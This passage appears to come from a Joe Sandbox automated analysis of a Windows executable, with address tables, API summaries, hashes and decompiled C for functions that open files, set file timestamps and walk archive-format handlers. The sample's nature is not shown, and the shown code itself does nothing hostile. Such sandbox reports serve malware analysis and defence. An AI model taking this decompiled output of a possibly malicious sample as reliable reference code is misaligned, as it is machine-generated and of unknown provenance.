                              0x0040af45
                              0x0040af4a
                              0x0040af52
                              0x0040af5b
                              0x0040af60
                              0x0040af67
                              0x0040b535
                              0x0040b538
                              0x0040b53d
                              0x0040b544
                              0x0040b603
                              0x0040b603
                              0x00000000
                              0x0040b603
                              0x0040af2a
                              0x0040aea2
                              0x0040aea9
                              0x0040aeab
                              0x0040aead
                              0x0040aeb0
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040ad7f
                              0x0040ad7f
                              0x0040ad82
                              0x0040ad82
                              0x0040ad84
                              0x0040ad8c
                              0x0040ad9c
                              0x0040ad9c
                              0x0040ad8e
                              0x0040ad8e
                              0x0040ad92
                              0x0040ad98
                              0x0040ad98
                              0x0040ada0
                              0x0040ada3
                              0x0040ada8
                              0x0040ada8
                              0x0040adae
                              0x0040adb0
                              0x0040adb6
                              0x0040adbc
                              0x0040adc1
                              0x0040adc7
                              0x0040adcb
                              0x0040adce
                              0x0040add6
                              0x0040adea
                              0x0040adea
                              0x0040add8
                              0x0040add8
                              0x0040addc
                              0x0040ade0
                              0x0040ade6
                              0x0040ade6
                              0x0040adee
                              0x0040adf1
                              0x0040adf6
                              0x0040adf6
                              0x0040adfa
                              0x0040adfd
                              0x0040ae01
                              0x0040ae0b
                              0x0040ae0f
                              0x0040ae13
                              0x0040ae17
                              0x0040ae1d
                              0x0040ae20
                              0x0040ae24
                              0x0040ae29
                              0x0040ae2c
                              0x0040ae32
                              0x0040ae37
                              0x0040ae37
                              0x0040ae3c
                              0x0040ae40
                              0x0040ae45
                              0x0040ae45
                              0x0040ae48
                              0x0040ae51
                              0x0040ae54
                              0x0040ae5d
                              0x00000000
                              0x0040ae5d

                              APIs
                              • __EH_prolog.LIBCMT ref: 0040AD1E
                                • Part of subcall function 0040D7CC: __EH_prolog.LIBCMT ref: 0040D7D1
                                • Part of subcall function 00413310: InitializeCriticalSection.KERNEL32(?,?,?,00000000,00000000), ref: 0041333E
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040AF52
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040B1DF
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040B24A
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040B2A7
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040B3B6
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040B410
                              • DeleteCriticalSection.KERNEL32(?,?,?,00000004,00000004), ref: 0040B485
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040B517
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$Delete$H_prolog$Initialize
                              • String ID:
                              • API String ID: 3452124646-0
                              • Opcode ID: 5f6b8a8cdbdc89edeaeca9fb6a48680f4fe42b6689f54ac84f6a401f85157967
                              • Instruction ID: 06aa0bffc57edc8446930be4fb3d3ecc4288fdccd94c57135405988f21593cb0
                              • Opcode Fuzzy Hash: 5f6b8a8cdbdc89edeaeca9fb6a48680f4fe42b6689f54ac84f6a401f85157967
                              • Instruction Fuzzy Hash: 5D625E7090024ADFDB14DFA4C944BDDBBB4EF14308F1480AEE815B72D2DB789A49DB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004059B3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62fileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              C-Code - Quality: 80%
                              			E004059B3(void** __ecx) {
				signed int _t23;
				void* _t24;
				signed int _t26;
				intOrPtr* _t29;
				signed int _t31;
				void** _t50;
				void* _t52;
				intOrPtr _t57;

				E00413954(E00419734, _t52);
				_t57 =  *0x423148; // 0x1
				_t50 = __ecx;
				if(_t57 != 0) {
					_t23 = E00405A63(__ecx);
					__eflags = _t23;
					if(_t23 != 0) {
						_t14 = _t52 + 0x14; // 0x414be4
						_t24 = CreateFileW( *(_t52 + 8),  *(_t52 + 0xc),  *(_t52 + 0x10), 0,  *_t14,  *(_t52 + 0x18), 0); // executed
						__eflags = _t24 - 0xffffffff;
						_t19 = _t24 != 0xffffffff;
						__eflags = _t19;
						 *_t50 = _t24;
						_t23 = 0 | _t19;
					}
				} else {
					E00401C80(_t52 - 0x18,  *(_t52 + 8));
					 *((intOrPtr*)(_t52 - 4)) = 0;
					_t26 = AreFileApisANSI();
					asm("sbb eax, eax");
					_push( ~_t26 + 1);
					_t29 = E00403D04(_t52 - 0x24);
					 *((char*)(_t52 - 4)) = 1;
					_t8 = _t52 + 0x14; // 0x414be4
					_t31 = E0040597A(_t50, _t57,  *_t29,  *(_t52 + 0xc),  *(_t52 + 0x10),  *_t8,  *(_t52 + 0x18));
					E00403A9C( *((intOrPtr*)(_t52 - 0x24)));
					E00403A9C( *((intOrPtr*)(_t52 - 0x18)));
					_t23 = _t31;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
				return _t23;
			}











                              0x004059b8
                              0x004059c3
                              0x004059ca
                              0x004059cc
                              0x00405a27
                              0x00405a2c
                              0x00405a2e
                              0x00405a34
                              0x00405a41
                              0x00405a49
                              0x00405a4c
                              0x00405a4c
                              0x00405a4f
                              0x00405a51
                              0x00405a51
                              0x004059ce
                              0x004059d4
                              0x004059d9
                              0x004059dc
                              0x004059e4
                              0x004059ed
                              0x004059ee
                              0x004059fa
                              0x004059fe
                              0x00405a08
                              0x00405a12
                              0x00405a1a
                              0x00405a20
                              0x00405a22
                              0x00405a58
                              0x00405a60

                              APIs
                              • __EH_prolog.LIBCMT ref: 004059B8
                              • AreFileApisANSI.KERNEL32(?,?,00000000,00000003,?,00000000,?,00000000), ref: 004059DC
                                • Part of subcall function 0040597A: CreateFileA.KERNEL32(?,00000001,?,00000000,?,?,00000000,?,KA,00405A0D,?,?,?,KA,?,00000001), ref: 0040599C
                              • CreateFileW.KERNELBASE(?,?,?,00000000,KA,?,00000000,?,00000000,00000003,?,00000000,?,00000000), ref: 00405A41
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: File$Create$ApisH_prolog
                              • String ID: KA
                              • API String ID: 1948390111-4133974868
                              • Opcode ID: f88b55b959810e929b2353b4b1d1eb61229a220c48e216d77a80ee84dd8b33a8
                              • Instruction ID: 6ceee1153368ae3910bf8b124445a1a72b78f4c7609cf7ab69cd6f34e54ac91e
                              • Opcode Fuzzy Hash: f88b55b959810e929b2353b4b1d1eb61229a220c48e216d77a80ee84dd8b33a8
                              • Instruction Fuzzy Hash: E0118E72A00109EFCF01AFA4D8818DE7F76EF08318F10412AF512B21A1CB398A65DF94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040483F Relevance: 6.0, APIs: 4, Instructions: 36filetimeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 719 40483f-40484b 720 404859-404876 CreateFileW 719->720 721 40484d-404857 SetLastError 719->721 723 404894-404896 720->723 724 404878-40488e SetFileTime CloseHandle 720->724 722 404897-404899 721->722 723->722 724->723
                              C-Code - Quality: 100%
                              			E0040483F(WCHAR* __ecx, FILETIME* __edx, FILETIME* _a4, FILETIME* _a8) {
				void* _t5;
				int _t7;
				signed int _t10;
				FILETIME* _t13;
				void* _t15;
				void* _t17;

				_t10 = 0;
				_t17 =  *0x423148 - _t10; // 0x1
				_t13 = __edx;
				if(_t17 != 0) {
					_t5 = CreateFileW(__ecx, 0x40000000, 3, 0, 3, 0x2000000, 0); // executed
					_t15 = _t5;
					if(_t15 != 0xffffffff) {
						_t7 = SetFileTime(_t15, _t13, _a4, _a8); // executed
						_t10 = 0 | _t7 != 0x00000000;
						CloseHandle(_t15);
					}
					return _t10;
				}
				SetLastError(0x78);
				return 0;
			}









                              0x00404840
                              0x00404842
                              0x00404849
                              0x0040484b
                              0x0040486b
                              0x00404871
                              0x00404876
                              0x00404882
                              0x0040488b
                              0x0040488e
                              0x0040488e
                              0x00000000
                              0x00404896
                              0x0040484f
                              0x00000000

                              APIs
                              • SetLastError.KERNEL32(00000078,0041B370,00000000,00402AAF,00000000,?,?,?,?), ref: 0040484F
                              • CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000003,02000000,00000000,?,0041B370,00000000,00402AAF,00000000,?,?,?,?), ref: 0040486B
                              • SetFileTime.KERNELBASE(00000000,00000000,?,?,?,40000000,00000003,00000000,00000003,02000000,00000000,?,0041B370,00000000,00402AAF,00000000), ref: 00404882
                              • CloseHandle.KERNEL32(00000000,?,40000000,00000003,00000000,00000003,02000000,00000000,?,0041B370,00000000,00402AAF,00000000,?,?,?), ref: 0040488E
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: File$CloseCreateErrorHandleLastTime
                              • String ID:
                              • API String ID: 2291555494-0
                              • Opcode ID: ff746e65f9cee30ffc8bafec341a8eb05b102094c88bf525f6141f2248b114e2
                              • Instruction ID: 64467d0e5ceda328e6e32eae128236dd02d513a4ef1926b956b8d25c0d97de23
                              • Opcode Fuzzy Hash: ff746e65f9cee30ffc8bafec341a8eb05b102094c88bf525f6141f2248b114e2
                              • Instruction Fuzzy Hash: B4F0E2762803507BE2302B60AC48F9B6E5CDBC9B25F108535B2A5A20E0C2294D1992B8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00408524 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 328COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 725 408524-40853c call 413954 728 408546-408579 call 40455d call 402170 725->728 729 40853e-408544 725->729 735 4085c5-4085dd call 4032a8 728->735 736 40857b-40857e 728->736 729->728 742 4085ef-4085f9 735->742 743 4085df-4085ed call 4039df 735->743 738 408582-408586 736->738 740 408590-408594 738->740 741 408588-40858a 738->741 746 408599-40859b 740->746 744 408596 741->744 745 40858c-40858e 741->745 748 4085fb-40860c call 4088ce 742->748 749 40863c-408640 742->749 758 40865e-408664 743->758 744->746 745->738 746->735 750 40859d-4085c4 call 401e19 call 401d7a call 403a9c 746->750 765 40862d-408631 call 4039df 748->765 766 40860e-40862b call 404407 748->766 751 408642-408646 749->751 752 40865c 749->752 750->735 756 408652-408657 call 4042eb 751->756 757 408648-40864d 751->757 752->758 756->752 761 408736-408755 call 4042ad call 403a9c * 2 757->761 763 408733-408735 758->763 764 40866a-40866f 758->764 793 408756-408764 761->793 763->761 769 408671-408678 call 4065b2 764->769 770 408683-4086ad call 40640d 764->770 774 408636-40863a 765->774 766->774 780 40867b-40867d 769->780 787 4086b5-4086b8 770->787 788 4086af-4086b3 770->788 774->748 774->749 780->770 783 408767-408769 780->783 783->761 791 4086d0-4086ea 787->791 792 4086ba-4086c7 787->792 790 408724-40872d 788->790 790->763 790->764 797 40876b-408774 791->797 798 4086ec-408701 791->798 856 4086c8 call 40df69 792->856 857 4086c8 call 40d1ab 792->857 794 4086cb-4086ce 796 408709-40870d 794->796 801 4087a1-4087a4 796->801 802 408713-40871c 796->802 799 408776-408778 797->799 800 40877c-40879f call 4042ad call 403a9c * 2 797->800 798->796 811 408703-408705 798->811 799->800 800->793 805 4087a6-4087af 801->805 806 4087bf-4087de 801->806 802->790 803 40871e-408720 802->803 803->790 809 4087b1-4087b3 805->809 810 4087b7-4087ba 805->810 815 4087e0-4087e8 806->815 816 4087f8-40881b call 405e34 call 40640d 806->816 809->810 810->761 811->796 817 4087ea 815->817 818 4087ef-4087f3 call 401d1b 815->818 826 408879-408886 call 4088ce 816->826 827 40881d-408877 call 401c80 * 2 call 407d82 call 401d7a call 403a9c * 3 816->827 817->818 818->816 832 408888 826->832 833 40888a-4088b5 call 407d82 call 401d7a call 403a9c 826->833 847 4088b6-4088bf 827->847 832->833 833->847 849 4088c1-4088c3 847->849 850 4088c7-4088c9 847->850 849->850 850->761 856->794 857->794
                              C-Code - Quality: 95%
                              			E00408524(intOrPtr* __ecx) {
				intOrPtr* _t153;
				signed int _t157;
				intOrPtr _t162;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t172;
				signed int _t178;
				signed int _t179;
				signed int _t185;
				void* _t187;
				signed int _t190;
				void* _t196;
				char* _t201;
				signed int _t203;
				signed int _t205;
				intOrPtr _t210;
				signed int _t220;
				signed int _t222;
				void* _t225;
				signed int _t231;
				intOrPtr _t257;
				intOrPtr _t278;
				signed int* _t289;
				signed int _t292;
				intOrPtr _t293;
				intOrPtr _t295;
				void* _t297;

				E00413954(E00419AE4, _t297);
				_t289 = __ecx;
				_t292 = 0;
				_t153 =  *((intOrPtr*)(__ecx));
				if(_t153 != 0) {
					 *((intOrPtr*)( *_t153 + 8))(_t153);
					 *((intOrPtr*)(__ecx)) = 0;
				}
				 *(_t289 + 0x34) = _t292;
				 *( *(_t289 + 0x30)) = _t292;
				E0040455D(_t289 + 4);
				 *(_t297 - 4) = _t292;
				 *(_t297 - 0x20) = _t292;
				 *(_t297 - 0x1c) = _t292;
				 *(_t297 - 0x18) = _t292;
				E00402170(_t297 - 0x20, 3);
				_t157 =  *(_t297 - 0x28);
				 *(_t297 - 4) = 1;
				if(_t157 == _t292) {
					L11:
					E004032A8(_t297 - 0x68, 4);
					 *((intOrPtr*)(_t297 - 0x68)) = 0x41b378;
					__eflags =  *(_t297 + 0xc) - _t292;
					 *(_t297 - 4) = 3;
					if( *(_t297 + 0xc) < _t292) {
						_t231 =  *(_t297 + 8);
						 *(_t297 + 0xc) = _t292;
						__eflags =  *(_t231 + 0x10);
						if( *(_t231 + 0x10) <= 0) {
							L18:
							__eflags =  *(_t297 + 0x10);
							if( *(_t297 + 0x10) != 0) {
								L22:
								_t292 = 0;
								__eflags = 0;
								L23:
								__eflags =  *((intOrPtr*)(_t297 - 0x60)) - _t292;
								 *(_t297 + 0xc) = _t292;
								if( *((intOrPtr*)(_t297 - 0x60)) <= _t292) {
									L37:
									_t293 = 1;
									L38:
									 *(_t297 - 4) = 1;
									E004042AD(_t297 - 0x68);
									E00403A9C( *(_t297 - 0x20));
									E00403A9C( *((intOrPtr*)(_t297 - 0x2c)));
									_t162 = _t293;
									L39:
									 *[fs:0x0] =  *((intOrPtr*)(_t297 - 0xc));
									return _t162;
								} else {
									goto L24;
								}
								do {
									L24:
									_t163 =  *(_t297 + 0x10);
									__eflags = _t163 - _t292;
									if(_t163 == _t292) {
										L26:
										 *(_t297 + 8) = _t292;
										 *(_t297 - 4) = 4;
										_t165 =  *( *((intOrPtr*)(_t297 - 0x5c)) +  *(_t297 + 0xc) * 4);
										 *(_t289 + 0x1c) = _t165;
										E0040640D(_t297 + 8,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t231 + 0x14)) + _t165 * 4)) + 4))());
										_t169 =  *(_t297 + 8);
										__eflags = _t169 - _t292;
										if(_t169 != _t292) {
											__eflags =  *(_t297 + 0x10) - _t292;
											if( *(_t297 + 0x10) == _t292) {
												 *(_t297 - 0x14) = _t292;
												 *(_t297 - 4) = 5;
												 *((intOrPtr*)( *_t169))(_t169, 0x41b1f8, _t297 - 0x14);
												_t171 =  *(_t297 - 0x14);
												__eflags = _t171 - _t292;
												if(_t171 == _t292) {
													_t172 =  *(_t297 + 8);
													 *(_t297 - 4) = 3;
													__eflags = _t172 - _t292;
													if(_t172 != _t292) {
														 *((intOrPtr*)( *_t172 + 8))(_t172);
													}
													 *(_t297 - 4) = 1;
													E004042AD(_t297 - 0x68);
													E00403A9C( *(_t297 - 0x20));
													E00403A9C( *((intOrPtr*)(_t297 - 0x2c)));
													_t162 = 0x80004001;
													goto L39;
												}
												 *((intOrPtr*)(_t297 - 0x10)) =  *((intOrPtr*)( *_t171 + 0xc))(_t171,  *((intOrPtr*)(_t297 + 0x14)));
												_t178 =  *(_t297 - 0x14);
												__eflags = _t178 - _t292;
												 *(_t297 - 4) = 4;
												if(_t178 != _t292) {
													 *((intOrPtr*)( *_t178 + 8))(_t178);
												}
												L33:
												__eflags =  *((intOrPtr*)(_t297 - 0x10)) - 1;
												if( *((intOrPtr*)(_t297 - 0x10)) != 1) {
													__eflags =  *((intOrPtr*)(_t297 - 0x10)) - _t292;
													if( *((intOrPtr*)(_t297 - 0x10)) == _t292) {
														 *(_t297 - 0x54) = _t292;
														 *(_t297 - 0x52) = _t292;
														_t179 =  *(_t297 + 8);
														 *(_t297 - 4) = 6;
														 *((intOrPtr*)( *_t179 + 0x20))(_t179, 0x37, _t297 - 0x54);
														__eflags =  *(_t297 - 0x54) - _t292;
														if( *(_t297 - 0x54) != _t292) {
															__eflags =  *(_t297 - 0x54) - 8;
															_t201 =  *(_t297 - 0x4c);
															if( *(_t297 - 0x54) != 8) {
																_t201 = L"Unknown error";
															}
															E00401D1B(_t289 + 0x30, _t201);
														}
														 *(_t297 - 4) = 4;
														E00405E34(_t297 - 0x54);
														E0040640D(_t289,  *(_t297 + 8));
														_t295 =  *((intOrPtr*)( *((intOrPtr*)(_t231 + 0x14)) +  *(_t289 + 0x1c) * 4));
														__eflags =  *(_t295 + 0x20);
														if( *(_t295 + 0x20) != 0) {
															_t185 = E004088CE(_t295, _t297 - 0x20);
															__eflags = _t185;
															if(_t185 < 0) {
																_t185 = 0;
																__eflags = 0;
															}
															_t257 =  *((intOrPtr*)(_t295 + 0x24));
															_t143 =  *((intOrPtr*)(_t257 + _t185 * 4)) + 0xc; // 0xc
															_push( *((intOrPtr*)(_t257 + _t185 * 4)));
															_t187 = E00407D82(_t297 - 0x50, _t297 - 0x2c);
															 *(_t297 - 4) = 0xa;
															E00401D7A(_t289 + 0x10, _t187);
															E00403A9C( *((intOrPtr*)(_t297 - 0x50)));
														} else {
															E00401C80(_t297 - 0x44, 0x423338);
															 *(_t297 - 4) = 7;
															E00401C80(_t297 - 0x38, 0x423338);
															_push(_t297 - 0x44);
															_push(_t297 - 0x38);
															 *(_t297 - 4) = 8;
															_t196 = E00407D82(_t297 - 0x50, _t297 - 0x2c);
															 *(_t297 - 4) = 9;
															E00401D7A(_t289 + 0x10, _t196);
															E00403A9C( *((intOrPtr*)(_t297 - 0x50)));
															E00403A9C( *((intOrPtr*)(_t297 - 0x38)));
															E00403A9C( *((intOrPtr*)(_t297 - 0x44)));
														}
														_t190 =  *(_t297 + 8);
														 *(_t297 - 4) = 3;
														__eflags = _t190;
														if(_t190 != 0) {
															 *((intOrPtr*)( *_t190 + 8))(_t190);
														}
														_t293 = 0;
													} else {
														_t203 =  *(_t297 + 8);
														 *(_t297 - 4) = 3;
														__eflags = _t203 - _t292;
														if(_t203 != _t292) {
															 *((intOrPtr*)( *_t203 + 8))(_t203);
														}
														_t293 =  *((intOrPtr*)(_t297 - 0x10));
													}
													goto L38;
												}
												_t205 =  *(_t297 + 8);
												 *(_t297 - 4) = 3;
												__eflags = _t205 - _t292;
												if(_t205 != _t292) {
													 *((intOrPtr*)( *_t205 + 8))(_t205);
												}
												goto L36;
											}
											 *((intOrPtr*)(_t297 - 0x10)) =  *((intOrPtr*)( *_t169 + 0xc))(_t169,  *(_t297 + 0x10), 0x41b5f8,  *((intOrPtr*)(_t297 + 0x18)));
											goto L33;
										}
										 *(_t297 - 4) = 3;
										goto L36;
									}
									_t210 =  *((intOrPtr*)( *_t163 + 0x10))(_t163, _t292, _t292, _t292, _t292);
									__eflags = _t210 - _t292;
									if(_t210 != _t292) {
										_t293 = _t210;
										goto L38;
									}
									goto L26;
									L36:
									 *(_t297 + 0xc) =  *(_t297 + 0xc) + 1;
									__eflags =  *(_t297 + 0xc) -  *((intOrPtr*)(_t297 - 0x60));
								} while ( *(_t297 + 0xc) <  *((intOrPtr*)(_t297 - 0x60)));
								goto L37;
							}
							__eflags =  *(_t297 + 0xc) - 1;
							if( *(_t297 + 0xc) == 1) {
								E004042EB(_t297 - 0x68, 1);
								goto L22;
							}
							_t293 = 0x80004001;
							goto L38;
						} else {
							goto L14;
						}
						do {
							L14:
							__eflags = E004088CE( *((intOrPtr*)( *((intOrPtr*)(_t231 + 0x14)) + _t292 * 4)), _t297 - 0x20);
							if(__eflags < 0) {
								E004039DF(_t297 - 0x68, _t292);
							} else {
								 *(_t297 + 0xc) =  *(_t297 + 0xc) + 1;
								E00404407(_t297 - 0x68, __eflags,  *(_t297 + 0xc));
								 *(( *(_t297 + 0xc) << 2) +  *((intOrPtr*)(_t297 - 0x5c))) = _t292;
								_t231 =  *(_t297 + 8);
							}
							_t292 = _t292 + 1;
							__eflags = _t292 -  *(_t231 + 0x10);
						} while (_t292 <  *(_t231 + 0x10));
						goto L18;
					}
					E004039DF(_t297 - 0x68,  *(_t297 + 0xc));
					_t231 =  *(_t297 + 8);
					goto L23;
				} else {
					_t278 =  *((intOrPtr*)(_t297 - 0x2c));
					_t220 = _t278 + _t157 * 2 - 2;
					while( *_t220 != 0x2e) {
						if(_t220 == _t278) {
							_t222 = _t220 | 0xffffffff;
							__eflags = _t222;
							L9:
							__eflags = _t222 - _t292;
							if(_t222 >= _t292) {
								__eflags = _t222 + 1;
								_t225 = E00401E19(_t297 - 0x2c, _t297 - 0x44, _t222 + 1);
								 *(_t297 - 4) = 2;
								E00401D7A(_t297 - 0x20, _t225);
								 *(_t297 - 4) = 1;
								E00403A9C( *((intOrPtr*)(_t297 - 0x44)));
							}
							goto L11;
						} else {
							_t220 = _t220;
							continue;
						}
					}
					_t222 = _t220 - _t278 >> 1;
					goto L9;
				}
			}
































                              0x00408529
                              0x00408534
                              0x00408536
                              0x00408538
                              0x0040853c
                              0x00408541
                              0x00408544
                              0x00408544
                              0x00408549
                              0x00408552
                              0x00408555
                              0x0040855f
                              0x00408562
                              0x00408565
                              0x00408568
                              0x0040856b
                              0x00408570
                              0x00408573
                              0x00408579
                              0x004085c5
                              0x004085ca
                              0x004085cf
                              0x004085d6
                              0x004085d9
                              0x004085dd
                              0x004085ef
                              0x004085f2
                              0x004085f5
                              0x004085f9
                              0x0040863c
                              0x0040863c
                              0x00408640
                              0x0040865c
                              0x0040865c
                              0x0040865c
                              0x0040865e
                              0x0040865e
                              0x00408661
                              0x00408664
                              0x00408733
                              0x00408735
                              0x00408736
                              0x00408739
                              0x0040873d
                              0x00408745
                              0x0040874d
                              0x00408753
                              0x00408756
                              0x0040875c
                              0x00408764
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040866a
                              0x0040866a
                              0x0040866a
                              0x0040866d
                              0x0040866f
                              0x00408683
                              0x00408683
                              0x0040868c
                              0x00408690
                              0x00408693
                              0x004086a3
                              0x004086a8
                              0x004086ab
                              0x004086ad
                              0x004086b5
                              0x004086b8
                              0x004086d0
                              0x004086df
                              0x004086e3
                              0x004086e5
                              0x004086e8
                              0x004086ea
                              0x0040876b
                              0x0040876e
                              0x00408772
                              0x00408774
                              0x00408779
                              0x00408779
                              0x0040877f
                              0x00408783
                              0x0040878b
                              0x00408793
                              0x00408799
                              0x00000000
                              0x0040879e
                              0x004086f5
                              0x004086f8
                              0x004086fb
                              0x004086fd
                              0x00408701
                              0x00408706
                              0x00408706
                              0x00408709
                              0x00408709
                              0x0040870d
                              0x004087a1
                              0x004087a4
                              0x004087bf
                              0x004087c3
                              0x004087c7
                              0x004087d3
                              0x004087d7
                              0x004087da
                              0x004087de
                              0x004087e0
                              0x004087e5
                              0x004087e8
                              0x004087ea
                              0x004087ea
                              0x004087f3
                              0x004087f3
                              0x004087fb
                              0x004087ff
                              0x00408809
                              0x00408814
                              0x00408817
                              0x0040881b
                              0x0040887f
                              0x00408884
                              0x00408886
                              0x00408888
                              0x00408888
                              0x00408888
                              0x0040888a
                              0x00408893
                              0x00408897
                              0x0040889b
                              0x004088a4
                              0x004088a8
                              0x004088b0
                              0x0040881d
                              0x00408826
                              0x0040882f
                              0x00408833
                              0x0040883e
                              0x00408842
                              0x00408846
                              0x0040884a
                              0x00408853
                              0x00408857
                              0x0040885f
                              0x00408867
                              0x0040886f
                              0x00408874
                              0x004088b6
                              0x004088b9
                              0x004088bd
                              0x004088bf
                              0x004088c4
                              0x004088c4
                              0x004088c7
                              0x004087a6
                              0x004087a6
                              0x004087a9
                              0x004087ad
                              0x004087af
                              0x004087b4
                              0x004087b4
                              0x004087b7
                              0x004087b7
                              0x00000000
                              0x004087a4
                              0x00408713
                              0x00408716
                              0x0040871a
                              0x0040871c
                              0x00408721
                              0x00408721
                              0x00000000
                              0x0040871c
                              0x004086cb
                              0x00000000
                              0x004086cb
                              0x004086af
                              0x00000000
                              0x004086af
                              0x00408678
                              0x0040867b
                              0x0040867d
                              0x00408767
                              0x00000000
                              0x00408767
                              0x00000000
                              0x00408724
                              0x00408724
                              0x0040872a
                              0x0040872a
                              0x00000000
                              0x0040866a
                              0x00408642
                              0x00408646
                              0x00408657
                              0x00000000
                              0x00408657
                              0x00408648
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004085fb
                              0x004085fb
                              0x0040860a
                              0x0040860c
                              0x00408631
                              0x0040860e
                              0x0040861a
                              0x0040861d
                              0x00408625
                              0x00408628
                              0x00408628
                              0x00408636
                              0x00408637
                              0x00408637
                              0x00000000
                              0x004085fb
                              0x004085e5
                              0x004085ea
                              0x00000000
                              0x0040857b
                              0x0040857b
                              0x0040857e
                              0x00408582
                              0x0040858a
                              0x00408596
                              0x00408596
                              0x00408599
                              0x00408599
                              0x0040859b
                              0x0040859d
                              0x004085a6
                              0x004085af
                              0x004085b3
                              0x004085bb
                              0x004085bf
                              0x004085c4
                              0x00000000
                              0x0040858c
                              0x0040858d
                              0x00000000
                              0x0040858d
                              0x0040858a
                              0x00408592
                              0x00000000
                              0x00408592

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: 83B$Unknown error
                              • API String ID: 3519838083-1944086607
                              • Opcode ID: 4eafd060168cf62d967f11a2e06bed2b646f89a5601815e0617f26fec8bbc86a
                              • Instruction ID: d43b38567734cbd3d280cef04a8de17ccbe463ec1fdb7709e9180388f705ec22
                              • Opcode Fuzzy Hash: 4eafd060168cf62d967f11a2e06bed2b646f89a5601815e0617f26fec8bbc86a
                              • Instruction Fuzzy Hash: A5D17070900259EFCF05DFA4C944ADEBB74BF14318F20846EF845BB291CB78AA45CB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00408F0A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 206COMMON
                              Download Yara Rule

                              Control-flow Graph

                              C-Code - Quality: 79%
                              			E00408F0A(intOrPtr __ecx) {
				intOrPtr _t105;
				intOrPtr _t113;
				void* _t115;
				intOrPtr _t118;
				long _t123;
				intOrPtr* _t131;
				void* _t137;
